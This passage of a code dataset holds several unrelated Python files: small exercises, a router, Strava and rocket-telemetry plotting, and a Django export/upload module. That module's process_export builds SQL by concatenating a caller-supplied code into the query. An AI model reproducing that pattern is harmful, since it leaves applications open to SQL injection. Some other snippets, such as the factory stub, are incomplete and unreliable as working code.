col_filter\")\nprint(test['Survived'])\n\n","sub_path":"AIE23/20191102_feature_engineering/a8_titanic/feature_test/filter_col_row_outlier.py","file_name":"filter_col_row_outlier.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"541333212","text":"import sys\nfrom importlib import import_module\nfrom pathlib import Path\nfrom typing import Dict\n\nfrom application.henavel.controller.routing.middleware.container import (\n middleware_manager,\n)\nfrom application.henavel.controller.routing.route import (\n RouteController,\n RouteRedirect,\n Route,\n)\nfrom application.settings import ROUTES_DIR\n\n\nclass RouteManager:\n def __init__(self):\n self.container: Dict[str, Route] = {}\n\n def is_registered(self, route: str):\n return route in self.container\n\n def resolve(self, path: str) -> Route:\n if path not in self.container:\n raise RouteNotRegisteredError(f\"a route for '{path}' is not found.\")\n\n route = self.container[path]\n\n route = middleware_manager.wrap(route)\n\n return route\n\n def controller(self, route: str, controller_class):\n self.container[route] = RouteController(controller_class)\n\n def redirect(self, route: str, url: str):\n self.container[route] = RouteRedirect(url)\n\n\nclass RouteNotRegisteredError(Exception):\n pass\n\n\ndef import_routes():\n sys.path.append(ROUTES_DIR)\n route_files = Path(ROUTES_DIR).glob(\"*.py\")\n\n for file in route_files:\n if file.name == \"__init__.py\":\n continue\n\n module_name = file.name.rsplit(\".py\", 1)[0]\n import_module(f\"{module_name}\")\n\n sys.path.pop()\n\n\nroute_manager = RouteManager()\nimport_routes()\n","sub_path":"application/henavel/controller/routing/route_manager.py","file_name":"route_manager.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"4747802","text":"def is_prime(n):\n assert int(n) > 0, \"Num must be positive\"\n if n == 1:\n return False\n i = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += 1\n return True\n\n\nn = int(input())\nprint(is_prime(n))","sub_path":"primes_tests/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330952459","text":"#\r\n# @lc app=leetcode.cn id=1262 lang=python3\r\n#\r\n# [1262] 可被三整除的最大和\r\n#\r\n# https://leetcode-cn.com/problems/greatest-sum-divisible-by-three/description/\r\n#\r\n# algorithms\r\n# Medium (33.74%)\r\n# Likes: 6\r\n# Dislikes: 0\r\n# Total Accepted: 838\r\n# Total Submissions: 2.5K\r\n# Testcase Example: '[3,6,5,1,8]'\r\n#\r\n# 给你一个整数数组 nums,请你找出并返回能被三整除的元素最大和。\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# 示例 1:\r\n#\r\n# 输入:nums = [3,6,5,1,8]\r\n# 输出:18\r\n# 解释:选出数字 3, 6, 1 和 8,它们的和是 18(可被 3 整除的最大和)。\r\n#\r\n# 示例 2:\r\n#\r\n# 输入:nums = [4]\r\n# 输出:0\r\n# 解释:4 不能被 3 整除,所以无法选出数字,返回 0。\r\n#\r\n#\r\n# 示例 3:\r\n#\r\n# 输入:nums = [1,2,3,4,4]\r\n# 输出:12\r\n# 解释:选出数字 1, 3, 4 以及 4,它们的和是 12(可被 3 整除的最大和)。\r\n#\r\n#\r\n#\r\n#\r\n# 提示:\r\n#\r\n#\r\n# 1 <= nums.length <= 4 * 10^4\r\n# 1 <= nums[i] <= 10^4\r\n#\r\n#\r\n#\r\n\r\n# @lc code=start\r\ntry:\r\n from typing import *\r\n from collections import defaultdict\r\n import heapq\r\nexcept Exception as err:\r\n print('Import failed: ' + str(err))\r\n\r\n\r\nclass Solution:\r\n def maxSumDivThree(self, nums: List[int]) -> int:\r\n # 先判断sm是否能被3整除\r\n # 不能的话则可以减去最小的余数和sm余数相同的数\r\n # 或者减去两个最小的余数和3-sm余数相同的数\r\n sm = sum(nums)\r\n if sm % 3 == 0: return sm\r\n cnt = [[], [], []]\r\n for n in nums:\r\n cnt[n % 3].append(n)\r\n INF = float('inf')\r\n for c in cnt:\r\n c.extend([INF, INF])\r\n mod = sm % 3\r\n return max(sm - sum(heapq.nsmallest(1, cnt[mod])),\r\n sm - sum(heapq.nsmallest(2, cnt[3 - mod])))\r\n\r\n\r\n# @lc code=end\r\nif __name__ == '__main__':\r\n print(Solution().maxSumDivThree([1, 2, 3, 4, 4]))\r\n","sub_path":"Medium/1262.可被三整除的最大和.py","file_name":"1262.可被三整除的最大和.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"53024730","text":"# -*- coding: latin1 -*-\n\ndiasVida = int(input('Insira o Numero de dias de Vida: '))\n\nano = int(diasVida / 365)\n\nprint ('%d ano(s)' % ano)\n\nmeses = int((diasVida / 30)) - (ano * 12)\n\nprint ('%d mes(es)' % meses)\n\nif diasVida == 365:\n dia = 0\nelse:\n dia = diasVida - ((diasVida / 30) * 30)\n\nprint ('%d dia(s)' % dia)\n","sub_path":"IdadeDias.py","file_name":"IdadeDias.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15816278","text":"#!/usr/bin/env/python\n\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport mysql.connector \nimport pandas as pd\nimport pandasql as psql\n#from psql import sqldf \n \n\n'''Loading in the Strava data'''\n\nstravadf_old_headers = pd.read_csv(\n'/Users/gracebreen/Python_files/Strava_Project/export_53215524/activities.csv',\nheader=0,\nusecols=['Activity Date', 'Activity Type', 'Elapsed Time', 'Distance', 'Average Grade', 'Calories'])\n#print(stravadf_old_headers.head(100))\n\n\n'''Changing the names of some columns to remove spaces'''\n\nstravadf = stravadf_old_headers.rename(columns={'Activity Type':'Activity_Type', 'Elapsed Time':'Elapsed_Time', 'Average Grade':'Average_Grade'})\n\n\nselected_df = psql.sqldf(\"select Average_Grade, Distance from stravadf\")\nprint(selected_df.head())\n\nplt.figure()\nplot = stravadf.plot(x=\"Average_Grade\", y=\"Distance\", style='o')\nplot.set_xlabel(\"Average Gradient\")\nplot.set_ylabel(\"Distance, Kilometres\")\nplt.title(\"Distance of Strava Activities versus Average Gradient\")\nplt.show()\nplt.savefig('Distance_versus_AvgGradient.png')\n","sub_path":"Strava_code.py","file_name":"Strava_code.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586023289","text":"# Problem:\n# Solution:\n# Where to use:\n# Best practicies:\n\nimport xml.etree.ElementTree as etree\nimport json\n\n\nclass JSONConnector:\n\n def __init__(self, path_file):\n self.data = {}\n with open(path_file, mode='r', encoding='utf-8') as f:\n self.data = json.load(f)\n\n @property\n def parsed_data(self):\n return self.data\n\ndef connect_to(path_file):\n factory = None\n try:\n factory = connection_factory(path_file)\n except ValueError as e:\n print(e)\n return factory\n\ndef main():\n print(\"FACTORY : sqlite\")\n sqlite_factory = connect_to('data/person.sq3')\n\n print(\"FACTORY: xml\")\n\n print(\"FACTORY: json\")\n\n\nif __name__ ==\"__main__\":\n main()\n","sub_path":"factory_pattern.py","file_name":"factory_pattern.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"553596478","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 10 09:47:02 2015\r\n\r\n@author: Artur\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import griddata, InterpolatedUnivariateSpline, UnivariateSpline, splrep, splev # for interpolation\r\nimport scipy.stats\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.gridspec as gridspec\r\nimport datetime\r\nimport os\r\nimport scipy.ndimage.filters as sf\r\nimport pdb\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport sys\r\nfrom PyQt4 import QtGui\r\nfrom configobj import ConfigObj\r\nimport pdb\r\nimport cone_calibration_v13 as cc\r\nimport Tkinter\r\nimport gui_tut as gui\r\n\r\ndef value_locate(refx,x):\r\n \"\"\"\r\n Python version of IDL's useful VALUE_LOCATE procedure.\r\n \"\"\"\r\n \r\n refx=np.array(refx)\r\n x=np.atleast_1d(x)\r\n loc=np.zeros(len(x),dtype='int')\r\n\r\n for i in range(len(x)):\r\n ix=x[i]\r\n ind=((refx-ix) <= 0).nonzero()[0]\r\n if len(ind) == 0: loc[i]=-1\r\n else: loc[i]=ind[-1]\r\n\r\n return loc\r\n \r\nclass cone_current_wadis(object):\r\n\r\n\r\n def read_bin_wadis(self):\r\n \"\"\"\r\n reads binary data written in WADIS PCM standard\r\n \"\"\"\r\n app = QtGui.QApplication(sys.argv)\r\n self.fn_bin = str(QtGui.QFileDialog.getOpenFileName(None,'Open bin file', '', '*.bin'))\r\n\r\n sync_int_1 = 235 #EB\r\n sync_int_2 = 144 #90\r\n frame_length = 29\r\n \r\n \r\n \r\n \r\n data = np.array(0)\r\n with open(self.fn_bin,'rb') as f:\r\n data_b = np.fromstring(f.read(), dtype='>5\r\n self.emr = np.reshape(emr, emr.size)\r\n iem = (np.int64(byte_data_arr[:,iem_ind_msb]) <<8) | np.int64(byte_data_arr[:,iem_ind_lsb])\r\n iem = np.reshape(iem, iem.size) \r\n\r\n self.emm = 4. * emm / 65535 # V\r\n self.iem = 33.333333 * iem / 4095 # µA\r\n\r\n\r\n hka = byte_data_arr[:,hka_bit]\r\n hkd = byte_data_arr[:,hkd_bit]\r\n \r\n self.ubat = np.float32(hkd[np.int32(np.where(hka == ubat_fr)[0])])*0.5\r\n self.sth = np.float32(hkd[np.int32(np.where(hka == sth_fr)[0])])*0.1\r\n self.iinstr = np.float32(hkd[np.int32(np.where(hka == iinstr_fr)[0])])\r\n self.uigp = np.float32(hkd[np.int32(np.where(hka == uigp_fr)[0])])*15\r\n self.iigp = np.float32(hkd[np.int32(np.where(hka == iigp_fr)[0])])\r\n self.p5v = np.float32(hkd[np.int32(np.where(hka == p5v_fr)[0])])*0.05\r\n self.p12v = np.float32(hkd[np.int32(np.where(hka == p12v_fr)[0])])*0.1\r\n self.p15v = np.float32(hkd[np.int32(np.where(hka == p15v_fr)[0])])*0.1\r\n self.m12v = np.float32(hkd[np.int32(np.where(hka == m12v_fr)[0])])*(-0.1)\r\n self.m15v = np.float32(hkd[np.int32(np.where(hka == m15v_fr)[0])])*(-0.1)\r\n self.uan = np.float32(hkd[np.int32(np.where(hka == uan_fr)[0])]) \r\n self.uoff = np.float32(hkd[np.int32(np.where(hka == uoff_fr)[0])])\r\n self.ush = np.float32(hkd[np.int32(np.where(hka == ush_fr)[0])])\r\n self.temp1 = np.float32(hkd[np.int32(np.where(hka == temp1_fr)[0])])\r\n self.temp2 = np.float32(hkd[np.int32(np.where(hka == temp2_fr)[0])])\r\n self.temp3 = np.float32(hkd[np.int32(np.where(hka == temp3_fr)[0])])\r\n \r\n frame_rate = 1085.07 # frames/sec\r\n main_rate=frame_rate*3\r\n hk_rate=frame_rate/16\r\n dt_main=np.float64(1)/main_rate\r\n dt_hk=np.float64(1)/hk_rate\r\n \r\n self.liftoff=np.uint8(((byte_data_arr[:,liftoff_ind]<<7)>>7))\r\n self.format_counter = 256*256*256*np.int64((byte_data_arr[:,5]<<2)>>2)\\\r\n +256*256*np.int64(byte_data_arr[:,6])+256*np.int64(byte_data_arr[:,7])+np.int64(byte_data_arr[:,8])\r\n self.start_ind=np.asarray(np.where(self.liftoff))[0,0] \r\n \r\n \r\n self.time_main = np.arange(emm.size)*dt_main\r\n \r\n self.time_ubat = np.arange(self.ubat.size)*dt_hk\r\n self.time_sth = np.arange(self.sth.size)*dt_hk\r\n self.time_iinstr = np.arange(self.iinstr.size)*dt_hk\r\n self.time_uigp = np.arange(self.uigp.size)*dt_hk\r\n self.time_iigp = np.arange(self.iigp.size)*dt_hk\r\n self.time_p5v = np.arange(self.p5v.size)*dt_hk\r\n self.time_p12v = np.arange(self.p12v.size)*dt_hk\r\n self.time_p15v = np.arange(self.p15v.size)*dt_hk\r\n self.time_m12v = np.arange(self.m12v.size)*dt_hk\r\n self.time_m15v = np.arange(self.m15v.size)*dt_hk\r\n self.time_uan = np.arange(self.uan.size)*dt_hk\r\n self.time_uoff = np.arange(self.uoff.size)*dt_hk\r\n self.time_ush = np.arange(self.ush.size)*dt_hk\r\n self.time_temp1 = np.arange(self.temp1.size)*dt_hk\r\n self.time_temp2 = np.arange(self.temp2.size)*dt_hk\r\n self.time_temp3 = np.arange(self.temp3.size)*dt_hk\r\n \r\n return self.emm, self.time_main\r\n \r\n def std_current(self):\r\n \r\n emm1 = self.emm\r\n iem = self.iem\r\n time_main = self.time_main\r\n # standard deviation of EMM and IEM, input: emm, time_main, iem)\r\n\r\n barotron_resolution = 0.025\r\n\r\n n_bar_res = np.ceil( emm1.size * barotron_resolution / ( np.max(time_main) - np.min(time_main) ) )\r\n n_means = np.floor(emm1.size / n_bar_res)\r\n minus_n_emm_4bar_res = (emm1.size % n_bar_res)\r\n \r\n shape = ( n_means, n_bar_res )\r\n\r\n emm1_2d = np.reshape(emm1[minus_n_emm_4bar_res:] , shape )\r\n iem_2d = np.reshape(iem[minus_n_emm_4bar_res:] , shape )\r\n time_2d = np.reshape(time_main[minus_n_emm_4bar_res:] , shape)\r\n \r\n emm1_std = np.std(emm1_2d, axis = 1)\r\n emm1_mean = np.mean(emm1_2d, axis = 1)\r\n emm1_std_proc = 100.* ( emm1_std / emm1_mean )\r\n \r\n iem_std = np.std(iem_2d, axis = 1)\r\n iem_mean = np.mean(iem_2d, axis = 1)\r\n iem_std_proc = 100.* ( iem_std / iem_mean )\r\n time_std = time_2d[ :,0]\r\n \r\n \r\n\r\n self.emm_std_proc = emm1_std_proc\r\n self.iem_std_proc = iem_std_proc\r\n self.time_std = time_std \r\n \r\n # ;------------------------------\r\n # ; 1. calculate (max-min)/2 for compatibility with old calibrations:\r\n # ; 2. replace NaN-values with mean over baratron_resolution-time:\r\n # ;------------------------------\r\n # ; arrays of (max-min)/2 values:\r\n\r\n emax = np.nanmax( emm1_2d, axis = 1)\r\n emin = np.nanmin( emm1_2d, axis = 1)\r\n emima = ( emax - emin ) / 2.\r\n self.emm_maxmin = 100.* emima / emm1_mean\r\n imax = np.nanmax( iem_2d, axis = 1)\r\n imin = np.nanmin( iem_2d, axis = 1)\r\n imima = ( imax - imin ) / 2.\r\n self.iem_maxmin = 100.* imima / iem_mean \r\n \r\n return None \r\n \r\n def plot_wadis_emm(self):\r\n fig1 = plt.figure('Electrometer Mantissa')\r\n ax1 = plt.subplot(111)\r\n ax1.plot(self.time_main, self.emm, 'k', linewidth = 1.0)\r\n ax1.plot(self.time_main, self.emr, 'r', linewidth = 1.0)\r\n ax1.set_ylabel('EMM current [nA] /RSF')\r\n ax1.set_ylim([0, 5])\r\n ax1.set_title('main channels')\r\n\r\n\r\n def plot_wadis_iem(self):\r\n fig1 = plt.figure('Emission Current')\r\n ax2 = plt.subplot(211)\r\n ax2.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax2.set_ylabel('IEM [micro A]')\r\n ax2.set_ylim([0, 20])\r\n\r\n ax3 = plt.subplot(212)\r\n ax3.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax3.set_ylabel('IEM focused [micro A]')\r\n ax3.set_ylim(np.max(self.iem)-1 , np.max(self.iem))\r\n \r\n \r\n def plot_wadis_hk_igp(self):\r\n fig2 = plt.figure('HK IGP channels')\r\n\r\n ax6 = plt.subplot(211)\r\n ax6.plot(self.time_uigp, self.uigp, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U igp [V]')\r\n ax6.set_ylim([0, 3500])\r\n \r\n ax7 = plt.subplot(212)\r\n ax7.plot(self.time_iigp, self.iigp, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('I igp [V]')\r\n ax7.set_ylim([0, 200])\r\n \r\n def plot_wadis_hk_rest(self):\r\n \r\n fig2 = plt.figure('hk channels')\r\n ax4 = plt.subplot(211)\r\n ax4.plot(self.time_ubat, self.ubat, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('U batt [V]')\r\n ax4.set_ylim([0, 100])\r\n ax4.set_title('HK channels 1')\r\n \r\n ax5 = plt.subplot(212)\r\n ax5.plot(self.time_iinstr, self.iinstr, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('I instr [V]')\r\n ax5.set_ylim([0, 200])\r\n \r\n \r\n fig3 = plt.figure('hk channels 2')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_p5v, self.p5v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('+5 V')\r\n ax4.set_ylim([0, 20])\r\n ax4.set_title('HK channels 2')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_p12v, self.p12v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('+12 V')\r\n ax5.set_ylim([0, 20])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_p15v, self.p15v, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('+ 15 V')\r\n ax6.set_ylim([0, 20])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uoff, self.uoff, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U offset [V]')\r\n ax7.set_ylim([0, 20])\r\n\r\n fig4 = plt.figure('hk channels 3')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_m12v, self.m12v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('-12 V')\r\n ax4.set_ylim([-20,0])\r\n ax4.set_title('HK channels 3')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_m15v, self.m15v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('-15 V')\r\n ax5.set_ylim([-20,0])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_ush, self.ush, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U shield [V]')\r\n ax6.set_ylim([0, 200])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uan, self.uan, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U anode [V]')\r\n ax7.set_ylim([0, 100])\r\n \r\n fig5 = plt.figure('hk channels 4')\r\n ax4 = plt.subplot(311)\r\n ax4.plot(self.time_temp1, self.temp1, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('temp 1')\r\n ax4.set_ylim([0,100])\r\n ax4.set_title('main channels')\r\n \r\n ax5 = plt.subplot(312)\r\n ax4.plot(self.time_temp2, self.temp2, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('temp 2')\r\n ax5.set_ylim([0,100])\r\n \r\n ax6 = plt.subplot(313)\r\n ax4.plot(self.time_temp3, self.temp3, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('temp 3')\r\n ax6.set_ylim([0, 100])\r\n \r\n def plot_wadis_std(self):\r\n fig6 = plt.figure('Standard Deviation / min-max plots')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_std, self.emm_std_proc, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('EMM std./ nA')\r\n ax4.set_yscale('log')\r\n ax4.set_ylim([0.01,2])\r\n ax4.set_title('Standard Deviation / min-max plots')\r\n\r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_std, self.iem_std_proc, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('IEM Std./ $\\mu$A')\r\n ax5.set_yscale('log')\r\n ax5.set_ylim([0.01,2])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_std, self.emm_maxmin, 'k', linewidth = 1.0)\r\n ax6.set_ylabel(r'EMM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax6.set_yscale('log')\r\n ax6.set_ylim(0.01,2)\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_std, self.iem_maxmin, 'k', linewidth = 1.0)\r\n ax7.set_ylabel(r'IEM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax7.set_yscale('log')\r\n ax7.set_ylim(0.01,2)\r\n \r\n def plot_and_save_wadis_all(self):\r\n fn_plot = self.fn_bin.split('/',10)[-1].split('.',10)[-2] + '_plot.pdf'\r\n\r\n pp = PdfPages(fn_plot)\r\n fig1 = plt.figure('main channels')\r\n ax1 = plt.subplot(311)\r\n ax1.plot(self.time_main, self.emm, 'k', linewidth = 1.0)\r\n ax1.plot(self.time_main, self.emr, 'r', linewidth = 1.0)\r\n ax1.set_ylabel('EMM current [nA] /RSF')\r\n ax1.set_ylim([0, 5])\r\n ax1.set_title('main channels')\r\n\r\n ax2 = plt.subplot(312)\r\n ax2.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax2.set_ylabel('IEM [micro A]')\r\n ax2.set_ylim([0, 20])\r\n\r\n ax3 = plt.subplot(313)\r\n ax3.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax3.set_ylabel('IEM focused [micro A]')\r\n ax3.set_ylim(np.max(self.iem)-1 , np.max(self.iem))\r\n \r\n plt.savefig(pp, format='pdf')\r\n fig2 = plt.figure('hk channels')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_ubat, self.ubat, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('U batt [V]')\r\n ax4.set_ylim([0, 100])\r\n ax4.set_title('HK channels 1')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_iinstr, self.iinstr, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('I instr [V]')\r\n ax5.set_ylim([0, 200])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_uigp, self.uigp, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U igp [V]')\r\n ax6.set_ylim([0, 3500])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_iigp, self.iigp, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('I igp [V]')\r\n ax7.set_ylim([0, 200])\r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n fig3 = plt.figure('hk channels 2')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_p5v, self.p5v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('+5 V')\r\n ax4.set_ylim([0, 20])\r\n ax4.set_title('HK channels 2')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_p12v, self.p12v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('+12 V')\r\n ax5.set_ylim([0, 20])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_p15v, self.p15v, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('+ 15 V')\r\n ax6.set_ylim([0, 20])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uoff, self.uoff, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U offset [V]')\r\n ax7.set_ylim([0, 20])\r\n \r\n plt.savefig(pp, format='pdf')\r\n fig4 = plt.figure('hk channels 3')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_m12v, self.m12v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('-12 V')\r\n ax4.set_ylim([-20,0])\r\n ax4.set_title('HK channels 3')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_m15v, self.m15v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('-15 V')\r\n ax5.set_ylim([-20,0])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_ush, self.ush, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U shield [V]')\r\n ax6.set_ylim([0, 200])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uan, self.uan, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U anode [V]')\r\n ax7.set_ylim([0, 100])\r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n fig5 = plt.figure('hk channels 4')\r\n ax4 = plt.subplot(311)\r\n ax4.plot(self.time_temp1, self.temp1, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('temp 1')\r\n ax4.set_ylim([0,100])\r\n ax4.set_title('main channels')\r\n \r\n ax5 = plt.subplot(312)\r\n ax4.plot(self.time_temp2, self.temp2, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('temp 2')\r\n ax5.set_ylim([0,100])\r\n \r\n ax6 = plt.subplot(313)\r\n ax4.plot(self.time_temp3, self.temp3, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('temp 3')\r\n ax6.set_ylim([0, 100])\r\n \r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n fig6 = plt.figure('Standard Deviation / min-max plots')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_std, self.emm_std_proc, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('EMM std./ nA')\r\n ax4.set_yscale('log')\r\n ax4.set_ylim([0.01,2])\r\n ax4.set_title('Standard Deviation / min-max plots')\r\n \r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_std, self.iem_std_proc, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('IEM Std./ $\\mu$A')\r\n ax5.set_yscale('log')\r\n ax5.set_ylim([0.01,2])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_std, self.emm_maxmin, 'k', linewidth = 1.0)\r\n ax6.set_ylabel(r'EMM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax6.set_yscale('log')\r\n ax6.set_ylim(0.01,2)\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_std, self.iem_maxmin, 'k', linewidth = 1.0)\r\n ax7.set_ylabel(r'IEM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax7.set_yscale('log')\r\n ax7.set_ylim(0.01,2)\r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n pp.close()\r\n return 0\r\n \r\nif __name__ == '__main__':\r\n \r\n c = cone_current_wadis()\r\n c.read_bin_wadis()\r\n c.std_current()\r\n # g=gui.simpleapp_tk(None)\r\n \r\n# app = gui.simpleapp_tk(None)\r\n# app.title('my application')\r\n# app.mainloop()\r\n \r\n# c.plot_wadis()\r\n \r\n# app1 = QtGui.QApplication(sys.argv)\r\n# fn_ini = str(QtGui.QFileDialog.getOpenFileName(None,'Open bin file', '', '*.ini')) \r\n# pdb.set_trace()\r\n# c=cc.cone_calibration(fn_ini)\r\n# c.calibration() ","sub_path":"IAP/cone_current_wadis.py","file_name":"cone_current_wadis.py","file_ext":"py","file_size_in_byte":19373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"71138846","text":"\"\"\"\nUpload an excel type file and process its contents.\n\nThe File Structure is defined as\n Initiative Code\n Initiative Name\n Domain Code\n Domain\n DomainDefaultWeight\n ActivityCode\n Activity Name\n Activity Default Impact\n activity Default Likelihood\n Statement Code\n Statement\n Statement Default Weight\n\nThe upload file may have one, two, or all of Domain, FBA, Statement\n\nRead the row\nif the itemCode(unique) exits in the database, then update the record\nif not, create it.\n\nIf the upload file contains a Domain and an FBA, connect the FBA to that Domain in the database\nIf the upload file contains an FBA and a Statement, connect the FBA to that Domain in the database\n\n\"\"\"\n\nfrom .models import Initiative, Domain, Activity, Statement\nimport os\nimport pandas as pd\nfrom django.db import connection\nfrom django.http import HttpResponse\nfrom io import BytesIO as IO\n\n\ndef process_export(initiative_code):\n \"\"\"\n A little hairy but it gets the job done.\n\n For this Initiative, go get domains (if any), their activities (if any), and thier statements (if any)\n The assumes that there is a chain of command, i.e. no statements without a parent activity...\n \"\"\"\n\n query = \"select\" + \\\n \" [library_initiative].[code] as Initiative_Code\" + \\\n \", [library_initiative].[name] as Initiative_Name\" + \\\n \", [library_initiative].[description] as Initiative_Description\" + \\\n \", [library_initiative].[status] as Initiative_Status\" + \\\n \", [library_domain].[code] as Domain_Code\" + \\\n \", [library_domain].[name] as Domain_Name\" + \\\n \", [library_domain].[default_weight] as Domain_Weight\" + \\\n \", [library_activity].[code] as Activity_Code\" + \\\n \", [library_activity].[name] as Activity_Name\" + \\\n \", [library_activity].[default_impact] as Activity_Impact\" + \\\n \", [library_activity].[default_likelihood] as Activity_Weight\" + \\\n \", [library_statement].[code] as Statement_Code\" + \\\n \", [library_statement].[name] as Statement_Name\" + \\\n \", [library_statement].[default_weight] as Statement_Weight\" + \\\n \" FROM [library_initiative] LEFT OUTER JOIN [library_domain]\" + \\\n \" ON [library_domain].[parent_initiative_id] = [library_initiative].[id]\" + \\\n \" LEFT OUTER JOIN [library_activity]\" + \\\n \" ON [library_activity].[parent_domain_id] = [library_domain].[id]\" + \\\n \" LEFT OUTER JOIN [library_statement]\" + \\\n \" ON [library_statement].[parent_activity_id] = [library_activity].[id]\" + \\\n \" WHERE [library_initiative].[code] = '\" + initiative_code + \"'\"\n\n df_output = pd.read_sql(query, connection)\n\n sio = IO()\n PandasWriter = pd.ExcelWriter(sio, engine='xlsxwriter')\n df_output.to_excel(PandasWriter, sheet_name='Sheet 1')\n PandasWriter.save()\n\n sio.seek(0)\n workbook = sio.getvalue()\n\n output_file = HttpResponse(workbook)\n output_file['content-type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n output_file['Content-Disposition'] = 'attachment; filename=' + initiative_code + '_export.xlsx'\n\n return output_file\n\n\ndef library_upload(filename, **kwargs):\n\n \"\"\"Read file with **kwargs; files supported: xls, xlsx, csv, csv.gz, pkl\"\"\"\n\n read_map = {'xls': pd.read_excel, 'xlsx': pd.read_excel, 'csv': pd.read_csv,\n 'gz': pd.read_csv, 'pkl': pd.read_pickle}\n\n ext = 